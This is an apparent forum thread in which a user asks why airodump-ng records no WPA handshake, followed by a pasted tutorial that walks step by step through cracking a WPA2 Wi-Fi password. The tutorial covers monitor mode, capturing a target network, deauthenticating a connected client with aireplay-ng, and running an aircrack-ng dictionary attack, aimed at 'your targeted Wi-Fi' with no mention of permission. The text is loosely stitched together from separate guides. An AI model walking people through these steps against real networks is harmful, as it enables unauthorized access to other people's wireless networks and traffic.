No handshake recorded from airodump-ng
I've just started to attempt this by following the guide from lewiscomputerhowto. I've seen other people ask similar questions, but they all seem to be older threads. The steps I've taken are shown below.
// Disconnect from all wireless networks. sudo airmon-ng // This will show all devices available for monitor sudo airmon-ng start wlan0mon // Should state that your wireless device has monitor mode enabled) // if not use the following steps sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up // end of troubleshoot sudo airodump-ng wlan0 // Identify desired network from the ESSID. Copy the BSSID of target. sudo airodump-ng -c 6 --bssid AP_MAC -w /home/luke/Desktop/airodump/ wlan0 // Identify bssid and associate which is marked under station sudo aireplay-ng –0 2 –a AP_MAC –c CLIENT_MAC wlan0
This results in this feedback without mentioning a handshake has been recorded.
21:22:43 Waiting for beacon frame (BSSID: AP_MAC) on channel 6 21:22:44 Sending 64 directed DeAuth. STMAC: [CLIENT_MAC] [ 4|10 ACKs] 21:22:45 Sending 64 directed DeAuth. STMAC: [CLIENT_MAC] [ 1|11 ACKs]
Am I doing this incorrectly, or any advice on how this can be accomplished.
- Use a wireless sniffer or protocol analyzer (WireShark or airmon-ng) to capture wireless packets. Sniffing this way is similar to how attackers sniff wired networks to eavesdrop and capture information sent across a network.
- Wait for a wireless client to authenticate. WPA wireless clients authenticate with WAPs using a four-way handshake where they exchange information. Essentially, the client needs to prove to the WAP that it knows the passphrase. However, the client doesn’t send the passphrase in cleartext. Instead, the four-way handshake allows the client to encrypt the passphrase in such a way that the WAP can decrypt it and verify that the client has the correct passphrase.
- Use a brute force attack. Once attackers have the encrypted passphrase from the captured four-way handshake, they can launch an offline brute force attack. Automated tools such as Aircrack-ng compare the encrypted password in the capture against passwords in one or more password files. When successful, it gives the attacker the actual passphrase used by the WLAN.
The first thing we need to do is to turn our network adapter (wifi network adapter) into monitor mode, this will enable us to see wireless beacons sent across the airwaves even though it’s not actually associated with any access point.
To make wlan1 as our monitor mode we execute this command on the terminal ‘airmon-ng start wlan1’ (refer to the image below) Check it if it is now on monitor mode. ‘iwconfig’ Now, we’re going to dump all the SSIDs found by our monitoring adapter. We use ‘airodump-ng mon0’, what this does it will look for those SSIDs that are being broadcast and dump those information on our terminal. Sample Output: Look for the ENC tab and see if there are WPA encryption.
Note: WPA2 is more stronger than WPA and it might take years to crack those things.
Look for your targeted Wi-Fi.
Do this code below.
-w -> write (in our case we dump it to wpa2 file)
–bssid -> our target’s bssid
mon0 -> monitor adapter
Now that we have completed the 1st step (Sniffing). We’ll proceed to the 2nd step (Wait for a wireless client to authenticate).
Well, there’s an automated way to do that otherwise you’ll just be waiting for a miracle.
We use ‘aireplay-ng’ which is an injection attack. This forces a re-authentication packet into the wire.
-0 10 -> it’s going to try 10 times; 0 it will not limit the deauthentication attempts
-a -> BSSID’s MAC Address (Wi-Fi)
-c -> Client’s Mac Address (You may find this one on a packet capture -> Wireshark.) If you know someone’s MAC you can try it just make sure it’s associated with the AP, or if you can’t it’s ok, it’s just more effective if you have a Client’s MAC.
mon0 – monitor adapter.
Wait for a ‘WPA Handshake’ to pop up on our airodump.
Now, navigate your way to the file we written earlier, the ‘wpa2’ one.
Now we will run ‘aircrack-ng’ against the dump file we gathered earlier.
-w -> this is going to point to our passwords file (A Dictionary of Passwords).
Now press Enter.
This is step 3 people (Use a brute force attack.). We’re trying to crack the password now. It runs through the dictionary for a match.